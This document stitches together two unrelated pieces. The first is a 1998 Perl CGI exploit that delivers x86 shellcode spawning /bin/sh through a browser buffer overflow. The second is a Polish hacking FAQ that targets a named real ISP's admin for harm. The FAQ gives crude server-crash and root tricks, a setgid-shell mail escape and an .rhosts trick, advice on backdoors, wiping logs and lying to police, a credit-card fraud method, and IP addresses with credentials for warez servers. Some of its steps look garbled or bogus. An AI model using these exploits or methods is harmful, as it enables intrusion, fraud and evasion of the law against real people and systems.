# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19

sub parse {
  join("", map { /^[0-9A-Fa-f]{2}$/ ? pack("c", hex($_)) : "" } @_);
}

# This is very tricky business.  Netscape maps unprintable characters
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine
# code must be free of these characters.  This makes it impossible
# to call int 0x80, so I put int 0x40 there and wrote code to
# shift those bytes left before it gets called.  Also null characters
# can't be used because of C string conventions.

# the first paragraph of the following turns the int 0x40 in the second
# paragraph into int 0x80.  the second paragraph nullifies the SIGALRM
# handler.

my $pre = parse qw{
  31 c0 		# xorl %eax,%eax
  66 b8 ff 0f		# movw $0x1056,%ax
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  29 c4			# subl %eax,%esp

  31 c0 b0 30
  31 db b3 0e
  31 c9 b1 01
  cd 40
};

my $code = $pre . parse qw{
  b0 55			# movb $0x55,%al (marker)
  eb 58			# (jump below)

  5e			# popl %esi

  56			# pushl %esi
  5b			# popl %ebx
  43 43 43 43 43 43
  43 43 43 43 43	# addl $0xb,%ebx

  21 33			# andl %esi,(%ebx)
  09 33			# orl %esi,(%ebx)

  31 c0 		# xorl %eax,%eax
  66 b8 56 10		# movw $0x1056,%ax
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  33 c0			# xorl %eax,%eax
  b0 05 		# movb $5,%al
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  29 c4			# subl %eax,%esp
  66 b8 56 10		# movw $0x1056,%ax
  29 c4			# subl %eax,%esp


  31 d2			# xorl %edx,%edx
  21 56 07		# andl %edx,0x7(%esi)
  21 56 0f		# andl %edx,0xf(%esi)
  b8 1b 56 34 12	# movl $0x1234561b,%eax
  35 10 56 34 12	# xorl $0x12345610,%eax 

  21 d9			# andl %ebx,%ecx
  09 d9			# orl %ebx,%ecx

  4b 4b 4b 4b 4b 4b
  4b 4b 4b 4b 4b	# subl $0xb,%ebx

  cd 40			# int $0x80
  31 c0			# xorl %eax,%eax
  40			# incl %eax
  cd 40			# int $0x80


  e8 a3 ff ff ff	# (call above)
};

$code .= "/bin/sh";

my $transmission = parse qw{
  6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz
  20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz
  79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz
  20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz
  79
};

my $nop = "\x90"; # this actually gets mapped onto 0x3f, but it doesn't seem
                  # to matter

my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be somewhere
                                  # in the chunk of nops.  works on every
                                  # linux box i've tried it on so far.
             

my $len = 0x1000 - length($pre);
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;
# the first $address is in the string replaces another
# pointer in the same function which gets dereferenced
# after the buffer is overflowed.  there must be a valid
# address there or it will segfault early.

print <<EOF;
Content-type: text/html

<!-- $transmission -->
<embed type="$exploit" src="data:x">
EOF

---CUT HERE---

*                                                                              *
********************************************************************************

*------------------------->Let's hack for real (kill)<-------------------------*

********************************************************************************
*                                                                              *
*   --------------->  1.Kill                                                   *
*                                                                              *
*  Moj nielubiany kolega jest administratorem lamerskiego server www.tpsa.pl   *
* a ja mam ochote zrobic mu krzywde !! To wlasnie tutaj zaraz opisze podam jak *
* na pare sposobow zawiesic server lub gorzej :)                               *
*      								               *
* -telnetujemy sie na port 53 serwera					       *
* -wpisujemy tam jakies bazgroly				               *
* -naciskamy enter i zamykamy sesje                                            *
* (serwer teraz nie przyjmuje zadnych danych)                                  *
* -piszemy ping -sv -i 127.0.0.1 224.0.0.1                                     *
* -system sie reebotuje                                                        *
* -Odpalamy program qmail                                                      *
* -i serwer jest czysty                                                        *
*                                                                              *
*   --------------->  2.Miec konto, miec roota                                 *
*                                                                              *
*  Aby miec roota wystarczy miec konto i albo dobra glowe albo pare exlopitow. *
* Zamiescilem pare exploitow by dostac roota powyzej ale sa jeszcze inne rzeczy*
* tak zwane BUGI czyli bledy w systemie:                                       *
*                                                                              *
*                                                                              *
* 1)XWINDOW                   						       *
* Dostanie roota                                                               *
*                                                                              *
* $ rlogin target                                                              *
* $ xwd -root -dsiplay localhost:0.0>~/snarfed.xwd                             *
* $ exit                                            		               *
* $ xwud -in ~/snarfed.xwd						       *
* niestety trzeba to zrobic z konta					       *
*									       *
* 2)Jakos to sobie nazwij                                                      *
*									       *
* fd = create("/usr/preserve/Exaaa$PID,0600);				       *
* chown ("/usr/preserve/Exaaa$PID,real_uid;real_gid			       *
* lub fchown (fd.............. itd  					       *
* niestety trzeba to zrobic z konta					       *
*									       *
* 3)Mail bugem							               *
*      							                       *
* Wysylamy mailem taka linijke       					       *
* ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh -dostaniemy roota                   *
*									       *
* 4)UUCP								       *
*									       *
* cat >x								       *
* myhostmyname							               *
* znak zatwierdzenia i D						       *
* uucp x ~uucp /.rhosts  						       *
* rsh myhost -l uucp -i							       *
*                                                                              *
*   --------------->  3.ROOT, co dalej ?                                       *
*                                                                              *
*  Dalej to juz tylko zabawa ale pamietaj nie kasuj nic na zywca tylko wywal   *
* strone wrzuc jakis apel anty tpsa, albo zaloz sobie backdoora lub kata,a to  *
* jest juz inna sprawa.W tym faqu nie bede sie wglebial w kasowanie logow itp  *
* sa miliony faqow ktore o tym pisza wiec ja naprawde nie musze.               *
*                                                                              *
*   --------------->  4.XXX                                                    *
*                                                                              *
*  Czyli porno za free to jest ten + kazdego hackera jezeli ci sie nudzi wlam  *
* sie na konto jakiegos goscia i ogladaj porno live na jego konto niestety     *
* jest to bardzo czasochlonne teraz opisze jak to sie robi:                    *
*                                                                              *
* -uruchamiasz programik webhack                                               *
* -wpisujesz adres strony w ramce dla strony                                   *
* -czekasz 3 dni az ci znajdzie jakies hasla :)                                *
*                                                                              *
*   --------------->  5.Admin czowa                                            *
*                                                                              *
*  Admin to twoj najwiekszy wrog szczegolnie jezeli jest inteligenty (zadkosc) *
* Nalezy uwazac na sprytnych adminow (tez zadkosc) najlepiej sie wlamywac kiedy*
* admin spi :P.                                                                *
*                                                                              *
*   --------------->  6.Uciekaj !                                              *
*                                                                              *
*  A wiec tak zebys nie musial uciekac za granice po namierzeniu ze polaczyles *
* sie z komputera u ojca w pracy :) :                                          *
*                                                                              *
*  -nie rozpowiadaj na ircu lub gdzies ze jestes hacker albo cos w tym stylu   *
*  -nigdy nie podawaj swoich danych,imienia,do hacku przyjmij nowa ksywe       *
*  -wchodz na zchakowany juz server gdzie masz backdoora i ssh/telnet uj sie na*
*  server ktory chcesz hackowac.                                               *
*  -wykasuj logi na servie na ktory sie wlamales jezeli nie wiesz jak nie rob  *
*  wlamu lub popros o pomoc jakiegos KOLEGE (czyt. nizej)                      *
*                                                                              *
*  Jezeli juz jest u ciebie policja pociskasz kit typu :                       *
* "Przepraszam bardzo ale moj kolega powiedzial ze to bedzie fajna zabawa ..." *
* jezeli jestes niewyslowiony to juz siedzisz na 2 lata.                       *
*                                                                              *
*                                                                              *
********************************************************************************

*---------------------------->INNE sposoby na zycie<---------------------------*

********************************************************************************
*                                                                              *
*   --------------->  1.Lubie ludzi                                            *
*                                                                              *
*  Lubie ludzi chyba jak kazdy .. ale nie oto tutaj chodzi ludzie w internetcie*
* nie sa twojimi przyjaciolmi tylko wrogami.Duzo hackerow czeka na lamy ktore  *
* dadza im kata na serverach a ci sobie zrobial hack.                          *
*                                                                              *
*   --------------->  2.Kupuje przez internet                                  *
*                                                                              *
*  Kupowac przez internet niezly numer !! Bierzesz sobie karte vise od wojka   *
* zmieniasz ostatnia liczbe numeru karty i kupujesz sobie telewizor,zamawiasz  *
* na jakis adres gdzie stoji stodola najlepiej (wies) odbierasz paczke podpisuj*
* sie jak Jan Kowalski lub inni.I masz telewizor :)                            *
*                                                                              *
*   --------------->  3.Phreak                                                 *
*                                                                              *
*  Hahaha ... phreak to jest jakby taka legenda wszytkie faqi klamia piszac o  *
* sposobach ktore nie dzialaja od lat, lub ktore sa na automaty ktorych nie ma *
* od czasu zmiany ustroju w naszym kraju jest tylko jeden faq ktory pisze cos  *
* prawdziwego o phreaku i nabija sie z tych wszystkich lamerkow.Jedyny sposob  *
* jaki ja znam to jest z komorka i automatem (czyt.jakis phreak faq).          *
*                                                                              *
*                        RESZTA TO LEGENDA                                     *
*                                                                              *
*   --------------->  4.Ludzie                                                 *
*                                                                              *
*   Feanks to :                                                                *
*      Perry , Carrigan , Loopp , Jerry , Kotk@                                *
*                                 All : #hackingpl                             *
*                                                                              *
*   --------------->  5.Linki                                                  *
*                                                                              *
* 212.33.34.84							               *
* mp3								               *
* mp3									       *
*    									       *
* 130.113.14.56:1128                                                           *
* user       								       *
* user									       *
*								               *
* hacksaw9.dynip.com:69							       *
* hacksaw						                       *
* hacksaw							               *
*									       *
* 129.63.206.135                                                               *
* anonymous   								       *
* blaa@firma.pl             					               *
*     									       *
* 128.243.152.90 						               *
* porn									       *
* porn									       *
*  									       *
* 24.8.211.56:69   							       *
* warez							                       *
* warez								               *
*									       *
*   ---------------> 6.Grupy hack					       *
*								               *
*	CULT OF THE DEATH COW - fajna grupa z US .. maja niezly dorobek i duzo *
*   dobrych programistow oficjalnie nie sa grupa hackerska.                    *
*	THE DRAGONS - najlepsza grupa hackerska na swiecie nikt nie ma z nimi  *
*   kontaku tylko pare osob.Warunkiem przyjecia do tej grupy jest hackowanie   *
*   3 serverow rzadowych z 3 roznych krajow w tydzien.		               *
*	ALT - polska grupa hackerska dla poczatkujacych ... ucza sie w grupie  *
*	GUMISIE - polska grupa hackerska z dobrym dorobkiem,sa to znani polscy *
*   hakerzy ktorzy przykryli sie jako gumisie.			               *
*								               *
*    Sorry ale nie chce mi sie ich wiecej wypisywac te sa najwazniejsze.       *
*								               *
*								               *
********************************************************************************

*   <KONIEC><KONIEC><KONIEC><KONIEC><KONIEC><KONIEC><KONIEC><KONIEC><KONIEC>   *

********************************************************************************